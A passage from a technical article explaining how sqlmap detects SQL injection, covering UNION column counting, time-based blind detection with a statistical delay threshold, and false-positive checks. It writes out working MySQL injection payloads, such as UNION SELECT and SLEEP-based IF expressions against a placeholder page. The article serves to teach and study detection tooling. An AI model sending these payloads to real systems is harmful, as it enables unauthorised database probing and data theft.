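    lower, upper = mean - UNION_STDEV_COEFF * sd, mean + UNION_STDEV_COEFF * sd
    if highest > upper:
        return ratios.index(highest) + 1, (mean, sd, lower, upper)
    if lowest < lower:
        return ratios.index(lowest) + 1, (mean, sd, lower, upper)
    return None, (mean, sd, lower, upper)   # no outlier: count not found


# The ten similarity values from the case, 1 to 10 NULL columns.
CASE_RATIOS = [0.714, 0.726, 0.834, 0.716, 0.71, 0.723, 0.724, 0.723, 0.725, 0.722]


def three_column_target(n):
    """Constructed oracle: the scenario's table has three columns, so
    ORDER BY 4 and above raises an error and the page changes."""
    return n <= 3


if __name__ == "__main__":
    print(order_by_column_count(three_column_target))   # 3
    print(union_null_column_count(CASE_RATIOS))         # (3, (mean, sd, lower, upper))
```

The widening loop is what lets the ORDER BY search escape the initial 1 to 10 range on wide tables, while the bisection keeps the number of requests logarithmic in the column count.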
Next, the SELECT NULL technique is used to determine the string position. sqlmap picks a position among the three columns, inserts a string concatenation expression there, and checks whether the response reflects the specific string. The packet is:
example.php?id=1 UNION ALL SELECT NULL,CONCAT(0x71707a7a71,0x625448774650554f4d435a696567784762446b776b5a53646c567a475259776c586a53694e675267,0x7178767671),NULL-- VdhL
The marker string is reflected in the response. The string position has been determined, and UNION injection is confirmed.
Time-based blind injection in sqlmap detection
Main process of time-based blind injection
The figure above is the flow chart of time-based blind injection. Above the dotted line is the preliminary request process; below the dotted line is the loop of requests for each injection point.
Response delay judgment is used throughout time-based blind injection; as the flow chart shows, it is applied three times for each injection point.
The false-positive check logic was described in the preliminary section; the analysis below covers the requests in the vulnerable environment.
Response delay judgment
Response delay judgment uses the Gaussian (normal) distribution (see SELECT NULL column-count detection for details). sqlmap's time-based test vectors contain two kinds of payload: those with an exact delay time, using the [SLEEPTIME] variable, and those that delay through heavy computation, using [DELAY]. Because the Gaussian model recognizes whether a response was produced by the normal mechanism rather than measuring an exact delay, [SLEEPTIME] and [DELAY] can be discussed as one case: sqlmap distinguishes the response mechanism, not the exact time.
Case analysis of time-based blind injection
The time-based blind injection case is analyzed in the vulnerable scenario above.
First, the original request:
example.php?id=1
The test vector that injects successfully:
<test>
<title>MySQL >= 5.0.12 AND time-based blind</title>
...
<vector>AND [RANDNUM]=IF(([INFERENCE]),SLEEP([SLEEPTIME]),[RANDNUM])</vector>
<request>
<payload>AND SLEEP([SLEEPTIME])</payload>
</request>
<response>
<time>[SLEEPTIME]</time>
</response>
<details>
<dbms>MySQL</dbms>
<dbms_version> >= 5.0.12</dbms_version>
</details>
</test>
Before the formal test, because response delay judgment needs a large number of normal responses as data for the Gaussian model, sqlmap first sends 30 original requests as the data source.
According to the test vector, [SLEEPTIME] is filled with the configured delay (5 seconds by default), and the generated packet is:
example.php?id=1 AND SLEEP(5)
The response is delayed. sqlmap then sets [SLEEPTIME] to 0 and sends:
example.php?id=1 AND SLEEP(0)
This response is not delayed. sqlmap then sets [SLEEPTIME] back to the value of the first request and sends the logically true packet:
example.php?id=1 AND SLEEP(5)
The response is delayed. At this point sqlmap believes the injection exists and enters the false-positive check phase.
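The delay decision behind "the response is delayed" in the three requests above is a one-sided version of the seven-standard-deviation rule: the 30 baseline timings are modeled, and a response counts as delayed only when it takes at least the larger of 0.5 seconds and mean + 7 sd. The following is an added example, not sqlmap's own code; the constants mirror sqlmap's settings, and the two baselines are constructed timings, not measurements.

```python
# Added example, not sqlmap's own code: the response-delay decision with
# sqlmap's constants.  Collect at least 30 timings of the unmodified
# request, then call a response delayed when its duration is at least
# max(0.5 s, mean + 7 * sd) of that baseline.  Timings are constructed.
import statistics

MIN_TIME_RESPONSES = 30             # sqlmap's MIN_TIME_RESPONSES
TIME_STDEV_COEFF = 7                # sqlmap's TIME_STDEV_COEFF
MIN_VALID_DELAYED_RESPONSE = 0.5    # sqlmap's MIN_VALID_DELAYED_RESPONSE, seconds


class ResponseTimes:
    """Baseline of normal response durations for one target."""

    def __init__(self, time_sec=5):
        self.samples = []
        self.time_sec = time_sec        # the [SLEEPTIME] value (--time-sec)

    def record(self, seconds):
        self.samples.append(seconds)

    def threshold(self):
        """Duration from which a response counts as delayed."""
        if len(self.samples) < MIN_TIME_RESPONSES:
            raise ValueError("need %d baseline responses, have %d"
                             % (MIN_TIME_RESPONSES, len(self.samples)))
        mean = statistics.mean(self.samples)
        sd = statistics.stdev(self.samples)
        if sd == 0:                     # degenerate baseline: fall back to the nominal delay
            return self.time_sec
        return max(MIN_VALID_DELAYED_RESPONSE, mean + TIME_STDEV_COEFF * sd)

    def was_delayed(self, duration):
        return duration >= self.threshold()


def baseline(offset, step):
    """Constructed 30-sample baseline cycling over eleven evenly spaced values."""
    times = ResponseTimes()
    for i in range(MIN_TIME_RESPONSES):
        times.record(offset + step * (i % 11))
    return times


# A quiet LAN target (0.18 - 0.20 s) and a jittery one (0.8 - 1.2 s).
QUIET = baseline(0.18, 0.002)
JITTERY = baseline(0.8, 0.04)


def demo():
    """SLEEP(5) vs SLEEP(0) against both baselines, plus a response that is
    well above the jittery mean but still inside seven standard deviations."""
    return (QUIET.threshold(), QUIET.was_delayed(5.2), QUIET.was_delayed(0.19),
            JITTERY.threshold(), JITTERY.was_delayed(6.0), JITTERY.was_delayed(1.5))


if __name__ == "__main__":
    print(demo())
```

On the quiet baseline the 0.5 second floor dominates, so a SLEEP(5) response is an easy call. On the jittery baseline the threshold moves up to roughly 1.85 seconds, which is why a 1.5 second response is not counted as delayed even though it is far above the mean; this is the price of keeping the false-positive rate low on noisy links, and it is why sqlmap keeps the baseline per target rather than using a fixed cut-off.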
In the time-based false-positive check, three different numbers are generated and combined into different expressions. Each expression replaces the original logic in the test vector, and sqlmap observes whether the response is as expected. Looking back at the test vector, it contains a <vector> tag, and the [INFERENCE] in that tag is where the expressions built from the three numbers are substituted.
Following the false-positive flow chart, there are five checks. The first:
example.php?id=1 AND 9187=IF((19=19),SLEEP(5),9187)
The response is delayed. The second:
example.php?id=1 AND 7052=IF((19=55),SLEEP(5),7052)
The response is not delayed. The third:
example.php?id=1 AND 1148=IF((19=58),SLEEP(5),1148)
The response is not delayed. The fourth:
example.php?id=1 AND 6574=IF((55=55),SLEEP(5),6574)
The response is delayed. The fifth (a deliberately invalid expression):
example.php?id=1 AND 4482=IF((58 55),SLEEP(5),4482)
The response is not delayed. The false-positive check is complete and the injection is confirmed.
Summary
Thank you for reading this far; reaching the summary and studying the technique in depth is not easy. I hope this article is of some help to those who want to read the sqlmap source code and to those who focus on automated SQL injection detection.
This article was published on Seebug Paper. Please indicate the source when reprinting. Address: https://paper.seebug.org/729/